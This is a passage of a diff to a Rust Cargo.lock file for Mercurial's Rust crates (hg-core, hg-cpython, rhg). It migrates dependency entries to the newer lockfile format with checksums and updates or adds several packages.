"b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87" dependencies = [ - "crossbeam-utils 0.7.2 (registry+https://github.com/rust-lang/crates.io-index)", - "maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)", + "crossbeam-utils 0.7.2", + "maybe-uninit", ] [[package]] name = "crossbeam-channel" version = "0.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crossbeam-utils 0.8.1", ] [[package]] name = "crossbeam-deque" version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crossbeam-epoch", + "crossbeam-utils 0.8.1", ] [[package]] name = "crossbeam-epoch" version = "0.9.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "const_fn", + "crossbeam-utils 0.8.1", + "lazy_static", + "memoffset", + "scopeguard", ] [[package]] name = "crossbeam-utils" version = "0.7.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "cfg-if 0.1.10", + "lazy_static", ] [[package]] name = "crossbeam-utils" version = "0.8.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "cfg-if 1.0.0", + "lazy_static", ] [[package]] name = "ctor" version = "0.1.16" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484" dependencies = [ - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "quote", + "syn", +] + +[[package]] +name = "derive_more" +version = "0.99.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "41cb0e6161ad61ed084a36ba71fbba9e3ac5aee3606fb607fe08da6acbcf3d8c" +dependencies = [ + "proc-macro2", + "quote", + "syn", ] [[package]] name = "difference" version = "2.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198" [[package]] name = "either" version = "1.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" [[package]] name = "env_logger" version = "0.7.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" dependencies = [ - "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", - "termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)", + "atty", + "humantime", + "log", + "regex", + "termcolor", ] [[package]] name = "flate2" version = "1.0.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)", - "miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crc32fast", + "libc", + "libz-sys", + "miniz_oxide", ] [[package]] name = "format-bytes" -version = "0.1.3" +version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1c4e89040c7fd7b4e6ba2820ac705a45def8a0c098ec78d170ae88f1ef1d5762" dependencies = [ - "format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)", - "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)", + "format-bytes-macros", + "proc-macro-hack", ] [[package]] name = "format-bytes-macros" -version = "0.1.2" +version = "0.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b05089e341a0460449e2210c3bf7b61597860b07f0deae58da38dbed0a4c6b6d" dependencies = [ - "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)", - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro-hack", + "proc-macro2", + "quote", + "syn", ] [[package]] name = "fuchsia-cprng" version = "0.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba" [[package]] name = "gcc" version = "0.3.55" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2" [[package]] name = "getrandom" version = "0.1.15" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "libc", + "wasi 0.9.0+wasi-snapshot-preview1", ] [[package]] name = "glob" version = "0.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" [[package]] name = "hermit-abi" version = "0.1.17" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", ] [[package]] -name = "hex" -version = "0.4.2" -source = "registry+https://github.com/rust-lang/crates.io-index" - -[[package]] name = "hg-core" version = "0.1.0" dependencies = [ - "byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)", - "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", - "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", - "hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)", - "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", - "memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)", - "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)", - "same-file 1.0.6 (registry+https://github.com/rust-lang/crates.io-index)", - "tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)", - "zstd 0.5.3+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)", + "byteorder", + "bytes-cast", + "clap", + "crossbeam-channel 0.4.4", + "derive_more", + "flate2", + "format-bytes", + "home", + "im-rc", + "lazy_static", + "log", + "memmap", + "micro-timer", + "pretty_assertions", + "rand 0.7.3", + "rand_distr", + "rand_pcg", + "rayon", + "regex", + "rust-crypto", + "same-file", + "tempfile", + "twox-hash", + "zstd", ] [[package]] name = "hg-cpython" version = "0.1.0" dependencies = [ - "cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", - "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", - "hg-core 0.1.0", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", + "cpython", + "crossbeam-channel 0.4.4", + "env_logger", + "hg-core", + "libc", + "log", +] + +[[package]] +name = "home" +version = "0.5.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2456aef2e6b6a9784192ae780c0f15bc57df0e918585282325e8c8ac27737654" +dependencies = [ + "winapi", ] [[package]] name = "humantime" version = "1.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" dependencies = [ - "quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)", + "quick-error", ] [[package]] name = "im-rc" version = "15.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" dependencies = [ - "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_xoshiro 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)", - "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)", - "version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)", + "bitmaps", + "rand_core 0.5.1", + "rand_xoshiro", + "sized-chunks", + "typenum", + "version_check", ] [[package]] name = "itertools" version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" dependencies = [ - "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)", + "either", ] [[package]] name = "jobserver" version = "0.1.21" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", ] [[package]] name = "lazy_static" version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" [[package]] name = "libc" version = "0.2.81" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb" [[package]] name = "libz-sys" version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655" dependencies = [ - "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)", - "pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)", - "vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)", + "cc", + "pkg-config", + "vcpkg", ] [[package]] name = "log" version = "0.4.11" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", ] [[package]] name = "maybe-uninit" version = "2.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00" [[package]] name = "memchr" version = "2.3.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525" [[package]] name = "memmap" version = "0.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "winapi", ] [[package]] name = "memoffset" version = "0.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", ] [[package]] name = "micro-timer" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c" dependencies = [ - "micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "micro-timer-macros", + "scopeguard", ] [[package]] name = "micro-timer-macros" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "scopeguard", + "syn", ] [[package]] name = "miniz_oxide" version = "0.4.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d" dependencies = [ - "adler 0.2.3 (registry+https://github.com/rust-lang/crates.io-index)", - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "adler", + "autocfg", +] + +[[package]] +name = "num-integer" +version = "0.1.44" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db" +dependencies = [ + "autocfg", + "num-traits", ] [[package]] name = "num-traits" version = "0.2.14" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", ] [[package]] name = "num_cpus" version = "1.13.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" dependencies = [ - "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "hermit-abi", + "libc", ] [[package]] name = "output_vt100" version = "0.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", +] + +[[package]] +name = "paste" +version = "0.1.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "45ca20c77d80be666aef2b45486da86238fabe33e38306bd3118fe4af33fa880" +dependencies = [ + "paste-impl", + "proc-macro-hack", +] + +[[package]] +name = "paste-impl" +version = "0.1.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d95a7db200b97ef370c8e6de0088252f7e0dfff7d047a28528e47456c0fc98b6" +dependencies = [ + "proc-macro-hack", ] [[package]] name = "pkg-config" version = "0.3.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c" [[package]] name = "ppv-lite86" version = "0.2.10" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857" [[package]] name = "pretty_assertions" version = "0.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427" dependencies = [ - "ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", - "ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)", - "difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)", + "ansi_term", + "ctor", + "difference", + "output_vt100", ] [[package]] name = "proc-macro-hack" version = "0.5.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5" [[package]] name = "proc-macro2" version = "1.0.24" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71" dependencies = [ - "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", + "unicode-xid", ] [[package]] name = "python27-sys" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f485897ed7048f5032317c4e427800ef9f2053355516524d73952b8b07032054" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "regex", ] [[package]] name = "python3-sys" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5b29b99c6868eb02beb3bf6ed025c8bcdf02efc149b8e80347d3e5d059a806db" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "regex", ] [[package]] name = "quick-error" version = "1.2.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0" [[package]] name = "quote" version = "1.0.7" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", ] [[package]] name = "rand" version = "0.3.23" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "rand 0.4.6", ] [[package]] name = "rand" version = "0.4.6" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293" dependencies = [ - "fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "fuchsia-cprng", + "libc", + "rand_core 0.3.1", + "rdrand", + "winapi", ] [[package]] name = "rand" version = "0.7.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03" dependencies = [ - "getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", + "getrandom", + "libc", + "rand_chacha", + "rand_core 0.5.1", + "rand_hc", ] [[package]] name = "rand_chacha" version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402" dependencies = [ - "ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "ppv-lite86", + "rand_core 0.5.1", ] [[package]] name = "rand_core" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b" dependencies = [ - "rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.4.2", ] [[package]] name = "rand_core" version = "0.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc" [[package]] name = "rand_core" version = "0.5.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19" dependencies = [ - "getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)", + "getrandom", ] [[package]] name = "rand_distr" version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2" dependencies = [ - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", + "rand 0.7.3", ] [[package]] name = "rand_hc" version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rand_pcg" version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rand_xoshiro" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rayon" version = "1.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "crossbeam-deque", + "either", + "rayon-core", ] [[package]] name = "rayon-core" version = "1.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a" dependencies = [ - "crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)", + "crossbeam-channel 0.5.0", + "crossbeam-deque", + "crossbeam-utils 0.8.1", + "lazy_static", + "num_cpus", ] [[package]] name = "rdrand" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2" dependencies = [ - "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.3.1", ] [[package]] name = "redox_syscall" version = "0.1.57" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce" [[package]] name = "regex" version = "1.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c" dependencies = [ - "aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)", - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", - "regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)", - "thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "aho-corasick", + "memchr", + "regex-syntax", + "thread_local", ] [[package]] name = "regex-syntax" version = "0.6.21" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189" [[package]] name = "remove_dir_all" version = "0.5.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "rhg" version = "0.1.0" dependencies = [ - "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", - "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", - "hg-core 0.1.0", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", + "chrono", + "clap", + "derive_more", + "env_logger", + "format-bytes", + "hg-core", + "lazy_static", + "log", + "micro-timer", + "regex", + "users", ] [[package]] name = "rust-crypto" version = "0.2.36" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a" dependencies = [ - "gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)", - "rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)", - "time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", + "gcc", + "libc", + "rand 0.3.23", + "rustc-serialize", + "time", ] [[package]] name = "rustc-serialize" version = "0.3.24" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda" [[package]] name = "same-file" version = "1.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" dependencies = [ - "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-util", ] [[package]] name = "scopeguard" version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" [[package]] name = "sized-chunks" version = "0.6.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f" dependencies = [ - "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)", + "bitmaps", + "typenum", ] [[package]] name = "static_assertions" version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 